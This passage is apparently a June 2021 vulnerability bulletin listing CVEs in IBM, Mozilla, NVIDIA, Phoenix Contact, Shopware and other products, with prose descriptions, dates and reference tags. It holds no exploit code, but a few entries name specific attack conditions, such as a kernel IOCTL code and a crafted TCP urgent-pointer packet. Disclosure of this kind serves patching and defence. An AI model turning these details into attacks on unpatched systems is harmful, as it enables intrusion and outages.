IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow a user who can create a view or inline SQL function to obtain sensitive information when AUTO_REVAL is set to DEFFERED_FORCE. IBM X-Force ID: 199283. 2021-06-24 not yet calculated CVE-2021-20579
XF
CONFIRM
ibm — db2
 
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 could allow an authenticated user to overwrite arbitrary files due to improper group permissions. IBM X-Force ID: 191945. 2021-06-24 not yet calculated CVE-2020-4945
XF
CONFIRM
ibm — security_secret_server
 
IBM Security Secret Server (IBM Security Verify Privilege Manager 10.8.2) is vulnerable to a buffer overflow, caused by improper bounds checking. A local attacker could overflow a buffer and execute arbitrary code on the system or cause the system to crash. IBM X-Force ID: 184917. 2021-06-25 not yet calculated CVE-2020-4609
XF
CONFIRM
ibm — security_secret_server
 
IBM Security Secret Server (IBM Security Verify Privilege Manager 10.8.2) could allow a local user to execute code due to improper integrity checks. IBM X-Force ID: 184919. 2021-06-25 not yet calculated CVE-2020-4610
XF
CONFIRM
ibm — security_verify
 
IBM Security Verify (IBM Security Verify Privilege Vault 10.9.66) is vulnerable to link injection. By persuading a victim to click on a specially-crafted URL link, a remote attacker could exploit this vulnerability to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. 2021-06-25 not yet calculated CVE-2021-29676
XF
CONFIRM
ibm — security_verify
 
IBM Security Verify (IBM Security Verify Privilege Vault 10.9.66) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. 2021-06-25 not yet calculated CVE-2021-29677
CONFIRM
XF
ibm — security_verify
 
IBM Security Verify (IBM Security Verify Privilege Vault 10.9.66) could disclose sensitive information through an HTTP GET request by a privileged user due to improper input validation. IBM X-Force ID: 199396. 2021-06-25 not yet calculated CVE-2021-20583
XF
CONFIRM
ibos — ibos
 
In IBOS 4.5.4 Open, Arbitrary File Inclusion causes getshell via /system/modules/dashboard/controllers/CronController.php. 2021-06-24 not yet calculated CVE-2020-21786
MISC
ibos — ibos
 
In IBOS 4.5.4 the email function has a cross site scripting (XSS) vulnerability in emailbody[content] parameter. 2021-06-24 not yet calculated CVE-2020-21783
MISC
ibos — ibos
 
In IBOS 4.5.4 Open, the database backup has Command Injection Vulnerability. 2021-06-24 not yet calculated CVE-2020-21785
MISC
imagemagick — imagemagick
 
ImageMagick 7.0.11-14 has a memory leak in AcquireSemaphoreMemory in semaphore.c and AcquireMagickMemory in memory.c. 2021-06-25 not yet calculated CVE-2021-34183
CONFIRM
jfinal — jfinal
 
In applications using jfinal 4.9.08 and below, there is a deserialization vulnerability when using Redis, which may allow remote code execution. 2021-06-24 not yet calculated CVE-2021-31649
MISC
MISC
jfinal — jfinal
 
An issue was discovered in JFinal framework v4.9.10 and below. The “set” method of the “Controller” class of jfinal framework is not strictly filtered, which will lead to XSS vulnerabilities in some cases. 2021-06-24 not yet calculated CVE-2021-33348
MISC
johnson_controls — exacqvision_enterprise_manager
 
exacqVision Enterprise Manager 20.12 does not sufficiently validate, filter, escape, and/or encode user-controllable input before it is placed in output that is used as a web page that is served to other users. 2021-06-24 not yet calculated CVE-2021-27658
CERT
CONFIRM
johnson_controls — exacqvision_web_service
 
exacqVision Web Service 21.03 does not sufficiently validate, filter, escape, and/or encode user-controllable input before it is placed in output that is used as a web page that is served to other users. 2021-06-24 not yet calculated CVE-2021-27659
CERT
CONFIRM
league — flysystem
 
Flysystem is an open source file storage library for PHP. The whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely. The conditions are: A user is allowed to supply the path or filename of an uploaded file, the supplied path or filename is not checked against unicode chars, the supplied pathname checked against an extension deny-list, not an allow-list, the supplied path or filename contains a unicode whitespace char in the extension, the uploaded file is stored in a directory that allows PHP code to be executed. Given these conditions are met a user can upload and execute arbitrary code on the system under attack. The unicode whitespace removal has been replaced with a rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1. 2021-06-24 not yet calculated CVE-2021-32708
MISC
MISC
CONFIRM
MISC
linux — linux_kernel
 
In kernel/bpf/verifier.c in the Linux kernel before 5.12.13, a branch can be mispredicted (e.g., because of type confusion) and consequently an unprivileged BPF program can read arbitrary memory locations via a side-channel attack, aka CID-9183671af6db. 2021-06-23 not yet calculated CVE-2021-33624
MISC
CONFIRM
CONFIRM
linux — linux_kernel
 
The vgacon subsystem in the Linux kernel before 5.8.10 mishandles software scrollback. There is a vgacon_scrolldelta out-of-bounds read, aka CID-973c096f6a85. 2021-06-24 not yet calculated CVE-2020-28097
MISC
MISC
MISC
MISC
mackron — miniaudio
 
Miniaudio 0.10.35 has a Double free vulnerability that could cause a buffer overflow in ma_default_vfs_close__stdio in miniaudio.h. 2021-06-25 not yet calculated CVE-2021-34184
CONFIRM
mackron — miniaudio
 
Miniaudio 0.10.35 has an integer-based buffer overflow caused by an out-of-bounds left shift in drwav_bytes_to_u32 in miniaudio.h 2021-06-25 not yet calculated CVE-2021-34185
CONFIRM
misp — misp
 
app/View/Elements/genericElements/IndexTable/Fields/generic_field.ctp in MISP 2.4.144 does not sanitize certain data related to generic-template:index. 2021-06-25 not yet calculated CVE-2021-35502
MISC
mongo-express — mongo-express
 
mongo-express is a web-based MongoDB admin interface, written with Node.js and express. 1: As mentioned in this issue: github.com/mongo-express/mongo-express/issues/577, when the content of a cell grows larger than the supported size, clicking on a row will show the full document unescaped; however, this needs admin interaction on the cell. 2: Data cells identified as media will be rendered as media, without being sanitized. Examples of different renders: image, audio, video, etc. As an example of a type 1 attack, an unauthorized user who can only send a large amount of data in a field of a document may use a payload with embedded JavaScript. This could send an export of a collection to the attacker without an admin even knowing. Other types of attacks, such as dropping a database collection, are possible. 2021-06-21 not yet calculated CVE-2021-21422
MISC
CONFIRM
MISC
moodle — moodle
 
A command execution vulnerability exists in the default legacy spellchecker plugin in Moodle 3.10. A specially crafted series of HTTP requests can lead to command execution. An attacker must have administrator privileges to exploit this vulnerability. 2021-06-23 not yet calculated CVE-2021-21809
MISC
mozilla — firefox
 
A compromised content process could have performed session history manipulations it should not have been able to due to testing infrastructure that was not restricted to testing-only configurations. This vulnerability affects Firefox < 88. 2021-06-24 not yet calculated CVE-2021-24001
MISC
MISC
mozilla — firefox
 
A race condition with requestPointerLock() and setTimeout() could have resulted in a user interacting with one tab when they believed they were on a separate tab. In conjunction with certain elements (such as <input type="file">) this could have led to an attack where a user was confused about the origin of the webpage and potentially disclosed information they did not intend to. This vulnerability affects Firefox < 88. 2021-06-24 not yet calculated CVE-2021-24000
MISC
MISC
mozilla — firefox
 
By utilizing 3D CSS in conjunction with Javascript, content could have been rendered outside the webpage’s viewport, resulting in a spoofing attack that could have been used for phishing or other attacks on a user. This vulnerability affects Firefox < 88. 2021-06-24 not yet calculated CVE-2021-23996
MISC
MISC
mozilla — firefox
 
Address bar search suggestions in private browsing mode were re-using session data from normal mode. *This bug only affects Firefox for Android. Other operating systems are unaffected.* This vulnerability affects Firefox < 89. 2021-06-24 not yet calculated CVE-2021-29963
MISC
MISC
mozilla — firefox
 
Due to unexpected data type conversions, a use-after-free could have occurred when interacting with the font cache. We presume that with enough effort this could have been exploited to run arbitrary code. This vulnerability affects Firefox < 88. 2021-06-24 not yet calculated CVE-2021-23997
MISC
MISC
mozilla — firefox
 
When styling and rendering an oversized `<select>` element, Firefox did not apply correct clipping which allowed an attacker to paint over the user interface. This vulnerability affects Firefox < 89. 2021-06-24 not yet calculated CVE-2021-29961
MISC
MISC
mozilla — firefox
 
Firefox used to cache the last filename used for printing a file. When generating a filename for printing, Firefox usually suggests the web page title. The caching and suggestion techniques combined may have led to the title of a website visited during private browsing mode being stored on disk. This vulnerability affects Firefox < 89. 2021-06-24 not yet calculated CVE-2021-29960
MISC
MISC
mozilla — firefox
 
Lack of escaping allowed HTML injection when a webpage was viewed in Reader View. While a Content Security Policy prevents direct code execution, HTML injection is still possible. *Note: This issue only affected Firefox for Android. Other operating systems are unaffected.* This vulnerability affects Firefox < 88. 2021-06-24 not yet calculated CVE-2021-29944
MISC
MISC
mozilla — firefox
 
When a user has already allowed a website to access microphone and camera, disabling camera sharing would not fully prevent the website from re-enabling it without an additional prompt. This was only possible if the website kept recording with the microphone until re-enabling the camera. This vulnerability affects Firefox < 89. 2021-06-24 not yet calculated CVE-2021-29959
MISC
MISC
mozilla — firefox
 
A transient execution vulnerability, named Floating Point Value Injection (FPVI), allowed an attacker to leak arbitrary memory addresses and may have also enabled JIT type confusion attacks. (A related vulnerability, Speculative Code Store Bypass (SCSB), did not affect Firefox.) This vulnerability affects Firefox ESR < 78.9 and Firefox < 87. 2021-06-24 not yet calculated CVE-2021-29955
MISC
MISC
MISC
mozilla — firefox
 
A malicious website that causes an HTTP Authentication dialog to be spawned could trick the built-in password manager to suggest passwords for the currently active website instead of the website that triggered the dialog. *This bug only affects Firefox for Android. Other operating systems are unaffected.* This vulnerability affects Firefox < 89. 2021-06-24 not yet calculated CVE-2021-29965
MISC
MISC
mozilla — firefox_esr_thunderbird_and_firefox
 
If a Blob URL was loaded through some unusual user interaction, it could have been loaded by the System Principal and granted additional privileges that should not be granted to web content. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88. 2021-06-24 not yet calculated CVE-2021-23999
MISC
MISC
MISC
MISC
mozilla — firefox_esr_thunderbird_and_firefox
 
A WebGL framebuffer was not initialized early enough, resulting in memory corruption and an out of bound write. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88. 2021-06-24 not yet calculated CVE-2021-23994
MISC
MISC
MISC
MISC
mozilla — firefox_esr_thunderbird_and_firefox
 
When a user clicked on an FTP URL containing encoded newline characters (%0A and %0D), the newlines would have been interpreted as such and allowed arbitrary commands to be sent to the FTP server. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88. 2021-06-24 not yet calculated CVE-2021-24002
MISC
MISC
MISC
MISC
mozilla — firefox_esr_thunderbird_and_firefox
 
When Responsive Design Mode was enabled, it used references to objects that were previously freed. We presume that with enough effort this could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88. 2021-06-24 not yet calculated CVE-2021-23995
MISC
MISC
MISC
MISC
mozilla — firefox_esr_thunderbird_and_firefox
 
Through complicated navigations with new windows, an HTTP page could have inherited a secure lock icon from an HTTPS page. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88. 2021-06-24 not yet calculated CVE-2021-23998
MISC
MISC
MISC
MISC
mozilla — firefox_esr_thunderbird_and_firefox
 
The WebAssembly JIT could miscalculate the size of a return type, which could lead to a null read and result in a crash. *Note: This issue only affected x86-32 platforms. Other platforms are unaffected.* This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88. 2021-06-24 not yet calculated CVE-2021-29945
MISC
MISC
MISC
MISC
mozilla — firefox_for_android
 
A malicious webpage could have forced a Firefox for Android user into executing attacker-controlled JavaScript in the context of another domain, resulting in a Universal Cross-Site Scripting vulnerability. *Note: This issue only affected Firefox for Android. Other operating systems are unaffected. Further details are being temporarily withheld to allow users an opportunity to update.* This vulnerability affects Firefox < 88.0.1 and Firefox for Android < 88.1.3. 2021-06-24 not yet calculated CVE-2021-29953
MISC
MISC
mozilla — hubs_cloud
 
Proxy functionality built into Hubs Cloud’s Reticulum software allowed access to internal URLs, including the metadata service. This vulnerability affects Hubs Cloud < mozillareality/reticulum/1.0.1/20210428201255. 2021-06-24 not yet calculated CVE-2021-29954
MISC
MISC
mozilla — thunderbird
 
An attacker may perform a DoS attack to prevent a user from sending encrypted email to a correspondent. If an attacker creates a crafted OpenPGP key with a subkey that has an invalid self signature, and the Thunderbird user imports the crafted key, then Thunderbird may try to use the invalid subkey, but the RNP library rejects it from being used, causing encryption to fail. This vulnerability affects Thunderbird < 78.9.1. 2021-06-24 not yet calculated CVE-2021-23993
MISC
MISC
mozilla — thunderbird
 
Thunderbird did not check if the user ID associated with an OpenPGP key has a valid self signature. An attacker may create a crafted version of an OpenPGP key, by either replacing the original user ID, or by adding another user ID. If Thunderbird imports and accepts the crafted key, the Thunderbird user may falsely conclude that the false user ID belongs to the correspondent. This vulnerability affects Thunderbird < 78.9.1. 2021-06-24 not yet calculated CVE-2021-23992
MISC
MISC
mozilla — thunderbird
 
Signatures are written to disk before and read during verification, which might be subject to a race condition when a malicious local process or user is replacing the file. This vulnerability affects Thunderbird < 78.10. 2021-06-24 not yet calculated CVE-2021-29948
MISC
MISC
mozilla — thunderbird
 
OpenPGP secret keys that were imported using Thunderbird version 78.8.1 up to version 78.10.1 were stored unencrypted on the user’s local disk. The master password protection was inactive for those keys. Version 78.10.2 will restore the protection mechanism for newly imported keys, and will automatically protect keys that had been imported using affected Thunderbird versions. This vulnerability affects Thunderbird < 78.10.2. 2021-06-24 not yet calculated CVE-2021-29956
MISC
MISC
mozilla — thunderbird
 
If a MIME encoded email contains an OpenPGP inline signed or encrypted message part, but also contains an additional unprotected part, Thunderbird did not indicate that only parts of the message are protected. This vulnerability affects Thunderbird < 78.10.2. 2021-06-24 not yet calculated CVE-2021-29957
MISC
MISC
mozilla — thunderbird
 
If a Thunderbird user has previously imported Alice’s OpenPGP key, and Alice has extended the validity period of her key, but Alice’s updated key has not yet been imported, an attacker may send an email containing a crafted version of Alice’s key with an invalid subkey, Thunderbird might subsequently attempt to use the invalid subkey, and will fail to send encrypted email to Alice. This vulnerability affects Thunderbird < 78.9.1. 2021-06-24 not yet calculated CVE-2021-23991
MISC
MISC
mozilla — thunderbird
 
When loading the shared library that provides the OTR protocol implementation, Thunderbird will initially attempt to open it using a filename that isn’t distributed by Thunderbird. If a computer has already been infected with a malicious library of the alternative filename, and the malicious library has been copied to a directory that is contained in the search path for executable libraries, then Thunderbird will load the incorrect library. This vulnerability affects Thunderbird < 78.9.1. 2021-06-24 not yet calculated CVE-2021-29949
MISC
MISC
mozilla — thunderbird_firefox_and_firefox_esr
 
A locally-installed hostile program could send `WM_COPYDATA` messages that Firefox would process incorrectly, leading to an out-of-bounds read. *This bug only affects Firefox on Windows. Other operating systems are unaffected.* This vulnerability affects Thunderbird < 78.11, Firefox < 89, and Firefox ESR < 78.11. 2021-06-24 not yet calculated CVE-2021-29964
MISC
MISC
MISC
MISC
mozilla — thunderbird_firefox_and_firefox_esr
 
The Mozilla Maintenance Service granted SERVICE_START access to BUILTIN|Users which, in a domain network, grants normal remote users access to start or stop the service. This could be used to prevent the browser update service from operating (if an attacker spammed the ‘Stop’ command); but also exposed attack surface in the maintenance service. *Note: This issue only affected Windows operating systems older than Win 10 build 1709. Other operating systems are unaffected.* This vulnerability affects Thunderbird < 78.10.1, Firefox < 87, and Firefox ESR < 78.10.1. 2021-06-24 not yet calculated CVE-2021-29951
MISC
MISC
MISC
MISC
msi_dragon_center — msi_dragon_center
 
MODAPI.sys in MSI Dragon Center 2.0.104.0 allows low-privileged users to access kernel memory and potentially escalate privileges via a crafted IOCTL 0x9c406104 call. This IOCTL provides the MmMapIoSpace feature for mapping physical memory. 2021-06-21 not yet calculated CVE-2021-29337
MISC
myq_x_smart — myq_server
 
MyQ Server in MyQ X Smart before 8.2 allows remote code execution by unprivileged users because administrative session data can be read in the %PROGRAMFILES%MyQPHPSessions directory. The “Select server file” feature is only intended for administrators but actually does not require authorization. An attacker can inject arbitrary OS commands (such as commands to create new .php files) via the Task Scheduler component. 2021-06-21 not yet calculated CVE-2021-31769
MISC
neos — form
 
neos/forms is an open source framework to build web forms. By crafting a special `GET` request containing a valid form state, a form can be submitted without invoking any validators. Form state is secured with an HMAC that is still verified. That means that this issue can only be exploited if Form Finishers cause side effects even if no form values have been sent. Form Finishers can be adjusted in a way that they only execute an action if the submitted form contains some expected data. Alternatively a custom Finisher can be added as first finisher. This regression was introduced with github.com/neos/form/commit/049d415295be8d4a0478ccba97dba1bb81649567 2021-06-21 not yet calculated CVE-2021-32697
MISC
MISC
MISC
CONFIRM
MISC
nvidia — geforce_experience
 
NVIDIA GeForce Experience, all versions prior to 3.23, contains a vulnerability where, if a user clicks on a maliciously formatted link that opens the GeForce Experience login page in a new browser tab instead of the GeForce Experience application and enters their login information, the malicious site can get access to the token of the user login session. Such an attack may lead to these targeted users’ data being accessed, altered, or lost. 2021-06-25 not yet calculated CVE-2021-1073
CONFIRM
nvidia — nvidia_mb2
 
Bootloader contains a vulnerability in NVIDIA MB2, which may cause free-the-wrong-heap, which may lead to limited denial of service. 2021-06-22 not yet calculated CVE-2021-34397
CONFIRM
nvidia — nvidia_mb2
 
Bootloader contains a vulnerability in access permission settings where unauthorized software may be able to overwrite NVIDIA MB2 code, which would result in limited denial of service. 2021-06-22 not yet calculated CVE-2021-34396
CONFIRM
nvidia — trusty
 
Trusty (the trusted OS produced by NVIDIA for Jetson devices) driver contains a vulnerability in the NVIDIA OTE protocol message parsing code where an integer overflow in a malloc() size calculation leads to a buffer overflow on the heap, which might result in information disclosure, escalation of privileges, and denial of service. 2021-06-22 not yet calculated CVE-2021-34372
CONFIRM
nvidia — trusty
 
Trusty TLK contains a vulnerability in the NVIDIA TLK kernel function where a lack of checks allows the exploitation of an integer overflow on the size parameter of the tz_map_shared_mem function. 2021-06-22 not yet calculated CVE-2021-34390
CONFIRM
nvidia — trusty
 
Trusty TLK contains a vulnerability in the NVIDIA TLK kernel’s tz_handle_trusted_app_smc function where a lack of integer overflow checks on the req_off and param_ofs variables leads to memory corruption of critical kernel structures. 2021-06-22 not yet calculated CVE-2021-34391
CONFIRM
nvidia — trusty
 
Trusty TLK contains a vulnerability in the NVIDIA TLK kernel where an integer overflow in the tz_map_shared_mem function can bypass boundary checks, which might lead to denial of service. 2021-06-22 not yet calculated CVE-2021-34392
CONFIRM
nvidia — trusty
 
Trusty contains a vulnerability in TSEC TA which deserializes the incoming messages even though the TSEC TA does not expose any command. This vulnerability might allow an attacker to exploit the deserializer to impact code execution, causing information disclosure. 2021-06-22 not yet calculated CVE-2021-34393
CONFIRM
nvidia — trusty
 
Trusty TLK contains a vulnerability in the NVIDIA TLK kernel where the multiplication of count and size in the calloc size calculation can overflow, which might lead to heap overflows. 2021-06-21 not yet calculated CVE-2021-34386
CONFIRM
nvidia — trusty
 
Trusty TLK contains a vulnerability in its access permission settings where it does not properly restrict access to a resource from a user with local privileges, which might lead to limited information disclosure and limited denial of service. 2021-06-22 not yet calculated CVE-2021-34395
CONFIRM
nvidia — trusty
 
The ARM TrustZone Technology on which Trusty is based contains a vulnerability in access permission settings where the portion of the DRAM reserved for TrustZone is identity-mapped by TLK with read, write, and execute permissions, which gives write access to kernel code and data that is otherwise mapped read only. 2021-06-21 not yet calculated CVE-2021-34387
CONFIRM
nvidia — trusty
 
Trusty contains a vulnerability in all TAs whose deserializer does not reject messages with multiple occurrences of the same parameter. The deserialization of untrusted data might allow an attacker to exploit the deserializer to impact code execution. 2021-06-22 not yet calculated CVE-2021-34394
CONFIRM
nvidia — trusty
 
Trusty contains a vulnerability in NVIDIA OTE protocol message parsing code, which is present in all the TAs. An incorrect bounds check leads to a memory leak of a portion of the heap situated after a stream buffer. 2021-06-21 not yet calculated CVE-2021-34389
CONFIRM
openemr — openemr
 
In OpenEMR, versions 5.0.0 to 6.0.0.1 are vulnerable to weak password requirements as it does not enforce a maximum password length limit. If a malicious user is aware of the first 72 characters of the victim user’s password, they can leverage it for an account takeover. 2021-06-24 not yet calculated CVE-2021-25923
MISC
MISC
opengrok — opengrok
 
Vulnerability in OpenGrok (component: Web App). Versions that are affected are 1.6.7 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via HTTPS to compromise OpenGrok. Successful attacks of this vulnerability can result in takeover of OpenGrok. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). 2021-06-23 not yet calculated CVE-2021-2322
MISC
oracle — glassfish_server
 
** UNSUPPORTED WHEN ASSIGNED ** Oracle GlassFish Server 3.1.2.18 and below allows /common/logViewer/logViewer.jsf XSS. A malicious user can cause an administrator user to supply dangerous content to the vulnerable page, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. 2021-06-25 not yet calculated CVE-2021-3314
MISC
ory — oathkeeper
 
ORY Oathkeeper is an Identity & Access Proxy (IAP) and Access Control Decision API that authorizes HTTP requests based on sets of Access Rules. When you make a request to an endpoint that requires the scope `foo` using an access token granted with that `foo` scope, introspection will be valid and that token will be cached. The problem comes when a second requests to an endpoint that requires the scope `bar` is made before the cache has expired. Whether the token is granted or not to the `bar` scope, introspection will be valid. A patch will be released with `v0.38.12-beta.1`. Per default, caching is disabled for the `oauth2_introspection` authenticator. When caching is disabled, this vulnerability does not exist. The cache is checked in [`func (a *AuthenticatorOAuth2Introspection) Authenticate(…)`](github.com/ory/oathkeeper/blob/6a31df1c3779425e05db1c2a381166b087cb29a4/pipeline/authn/authenticator_oauth2_introspection.go#L152). From [`tokenFromCache()`](github.com/ory/oathkeeper/blob/6a31df1c3779425e05db1c2a381166b087cb29a4/pipeline/authn/authenticator_oauth2_introspection.go#L97) it seems that it only validates the token expiration date, but ignores whether the token has or not the proper scopes. The vulnerability was introduced in PR #424. During review, we failed to require appropriate test coverage by the submitter which is the primary reason that the vulnerability passed the review process. 2021-06-22 not yet calculated CVE-2021-32701
MISC
MISC
CONFIRM
palo_alto_networks — cortex_xsoar
 
An improper authorization vulnerability in Palo Alto Networks Cortex XSOAR enables a remote unauthenticated attacker with network access to the Cortex XSOAR server to perform unauthorized actions through the REST API. This issue impacts: Cortex XSOAR 6.1.0 builds later than 1016923 and earlier than 1271064; Cortex XSOAR 6.2.0 builds earlier than 1271065. This issue does not impact Cortex XSOAR 5.5.0, Cortex XSOAR 6.0.0, Cortex XSOAR 6.0.1, or Cortex XSOAR 6.0.2 versions. All Cortex XSOAR instances hosted by Palo Alto Networks are upgraded to resolve this vulnerability. No additional action is required for these instances. 2021-06-22 not yet calculated CVE-2021-3044
MISC
pam_setquota.c — pam_setquota.c
 
pam_setquota.c in the pam_setquota module before 2020-05-29 for Linux-PAM allows local attackers to set their quota on an arbitrary filesystem, in certain situations where the attacker’s home directory is a FUSE filesystem mounted under /home. 2021-06-22 not yet calculated CVE-2020-36394
MISC
pandorafms — pandorafms
 
PandoraFMS <=7.54 allows Stored XSS by placing a payload in the name field of a visual console. When a user or an administrator visits the console, the XSS payload will be executed. 2021-06-25 not yet calculated CVE-2021-35501
MISC
pandorafms — pandorafms
 
PandoraFMS <=7.54 allows arbitrary file upload, leading to remote command execution via the File Manager. To bypass the built-in protection, a relative path is used in the requests. 2021-06-25 not yet calculated CVE-2021-34074
MISC
phoenix_contact — axl_f_bk_and_il_bk_products
 
In certain devices of the Phoenix Contact AXL F BK and IL BK product families an undocumented password protected FTP access to the root directory exists. 2021-06-25 not yet calculated CVE-2021-33540
CONFIRM
phoenix_contact — classic_automation_worx_software_suite
 
Phoenix Contact Classic Automation Worx Software Suite in Version 1.87 and below is affected by a remote code execution vulnerability. Manipulated PC Worx or Config+ projects could lead to a remote code execution when unallocated memory is freed because of incompletely initialized data. The attacker needs to get access to an original bus configuration file (*.bcp) to be able to manipulate data inside. After manipulation the attacker needs to exchange the original file by the manipulated one on the application programming workstation. Availability, integrity, or confidentiality of an application programming workstation might be compromised by attacks using these vulnerabilities. Automated systems in operation which were programmed with one of the above-mentioned products are not affected. 2021-06-25 not yet calculated CVE-2021-33542
CONFIRM
phoenix_contact — classic_line_controllers
 
Phoenix Contact Classic Line Controllers ILC1x0 and ILC1x1 in all versions/variants are affected by a Denial-of-Service vulnerability. The communication protocols and device access do not feature authentication measures. Remote attackers can use specially crafted IP packets to cause a denial of service on the PLC’s network communication module. A successful attack stops all network communication. To restore the network connectivity the device needs to be restarted. The automation task is not affected. 2021-06-25 not yet calculated CVE-2021-33541
CONFIRM
phoenix_contact — fl_comserver_uni
 
In Phoenix Contact FL COMSERVER UNI in versions < 2.40 an invalid Modbus exception response can lead to a temporary denial of service. 2021-06-25 not yet calculated CVE-2021-21002
CONFIRM
phoenix_contact — fl_switch_smcs
 
In Phoenix Contact FL SWITCH SMCS series products in multiple versions fragmented TCP-Packets may cause a Denial of Service of Web-, SNMP- and ICMP-Echo services. The switching functionality of the device is not affected. 2021-06-25 not yet calculated CVE-2021-21003
CONFIRM
phoenix_contact — fl_switch_smcs
 
In Phoenix Contact FL SWITCH SMCS series products in multiple versions an attacker may insert malicious code via LLDP frames into the web-based management which could then be executed by the client. 2021-06-25 not yet calculated CVE-2021-21004
CONFIRM
phoenix_contact — fl_switch_smcs
 
In Phoenix Contact FL SWITCH SMCS series products in multiple versions if an attacker sends a hand-crafted TCP-Packet with the Urgent-Flag set and the Urgent-Pointer set to 0, the network stack will crash. The device needs to be rebooted afterwards. 2021-06-25 not yet calculated CVE-2021-21005
CONFIRM
phpwcms — phpwcms
 
phpwcms 1.9.13 is vulnerable to Code Injection via /phpwcms/setup/setup.php. 2021-06-24 not yet calculated CVE-2020-21784
MISC
pterodactyl — wings
 
Wings is the control plane software for the open source Pterodactyl game management system. All versions of Pterodactyl Wings prior to `1.4.4` are vulnerable to system resource exhaustion due to improper container process limits being defined. A malicious user can consume more resources than intended and cause downstream impacts to other clients on the same hardware, eventually causing the physical server to stop responding. Users should upgrade to `1.4.4` to mitigate the issue. There is no non-code based workaround for impacted versions of the software. Users running customized versions of this software can manually set a PID limit for containers created. 2021-06-22 not yet calculated CVE-2021-32699
MISC
CONFIRM
qnap — qnap_nas
 
A command injection vulnerability has been reported to affect QNAP NAS running legacy versions of QTS. If exploited, this vulnerability allows attackers to execute arbitrary commands in a compromised application. This issue affects: QNAP Systems Inc. QTS versions prior to 4.3.6.1663 Build 20210504; versions prior to 4.3.3.1624 Build 20210416. This issue does not affect: QNAP Systems Inc. QTS 4.5.3. QNAP Systems Inc. QuTS hero h4.5.3. QNAP Systems Inc. QuTScloud c4.5.5. 2021-06-24 not yet calculated CVE-2021-28800
MISC
react-bootstrap-table — react-bootstrap-table
 
All versions of package react-bootstrap-table are vulnerable to Cross-site Scripting (XSS) via the dataFormat parameter. The problem is triggered when an invalid React element is returned, leading to dangerouslySetInnerHTML being used, which does not sanitize the output. 2021-06-24 not yet calculated CVE-2021-23398
CONFIRM
CONFIRM
CONFIRM
CONFIRM
report_portal — report_portal
 
Report portal is an open source reporting and analysis framework. Starting from version 3.1.0 of the service-api XML parsing was introduced. Unfortunately the XML parser was not configured properly to prevent XML external entity (XXE) attacks. This allows a user to import a specifically-crafted XML file which imports external Document Type Definition (DTD) file with external entities for extraction of secrets from Report Portal service-api module or server-side request forgery. This will be resolved in the 5.4.0 release. 2021-06-23 not yet calculated CVE-2021-29620
MISC
CONFIRM
MISC
roundcube — roundcube_mail
 
Cross Site Scripting (XSS) vulnerability in Roundcube Mail .4.4 via database host and user in /installer/test.php. 2021-06-24 not yet calculated CVE-2020-18670
MISC
MISC
MISC
roundcube — roundcube_mail
 
Cross Site Scripting (XSS) vulnerability in Roundcube Mail <=1.4.4 via smtp config in /installer/test.php. 2021-06-24 not yet calculated CVE-2020-18671
MISC
MISC
MISC
ruby_on_rails — ruby_on_rails
 
In the bindata RubyGem before version 2.4.10 there is a potential denial-of-service vulnerability. In affected versions it is very slow for certain classes in BinData to be created. For example BinData::Bit100000, BinData::Bit100001, BinData::Bit100002, BinData::Bit<N>. In combination with <user_input>.constantize there is a potential for a CPU-based DoS. In version 2.4.10 bindata improved the creation time of Bits and Integers. 2021-06-24 not yet calculated CVE-2021-32823
MISC
MISC
CONFIRM
MISC
MISC
sas — environment_manager
 
SAS Environment Manager 2.5 allows XSS through the Name field when creating/editing a server. The XSS will prompt when editing the Configuration Properties. 2021-06-25 not yet calculated CVE-2021-35475
MISC
MISC
shopware — shopware
 
Shopware is an open source eCommerce platform. In versions prior to 6.4.1.1 the admin API exposed some internal hidden fields when an association was loaded with a to-many reference. Users are recommended to update to version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview. For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. 2021-06-24 not yet calculated CVE-2021-32716
MISC
MISC
CONFIRM
shopware — shopware
 
Shopware is an open source eCommerce platform. Versions prior to 5.6.10 are vulnerable to system information leakage in error handling. Users are recommended to update to version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview. 2021-06-24 not yet calculated CVE-2021-32712
MISC
MISC
CONFIRM
shopware — shopware
 
Shopware is an open source eCommerce platform. Versions prior to 6.3.5.1 may leak information via the Store-API. The vulnerability could only be fixed by changing the API system, which involves a non-backward-compatible change. Only consumers of the Store-API should be affected by this change. We recommend updating to the current version 6.3.5.1. You can get the update to 6.3.5.1 regularly via the Auto-Updater or directly via the download overview: www.shopware.com/en/download/#shopware-6. Please check your plugins if you have the Store-API in use. Detailed technical information can be found in the upgrade information: github.com/shopware/platform/blob/v6.3.5.1/UPGRADE-6.3.md#6351. Workarounds: for older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin (store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659). For the full range of functions, we recommend updating to the latest Shopware version. For more information: docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2021 2021-06-24 not yet calculated CVE-2021-32711
MISC
MISC
CONFIRM
shopware — shopware
 
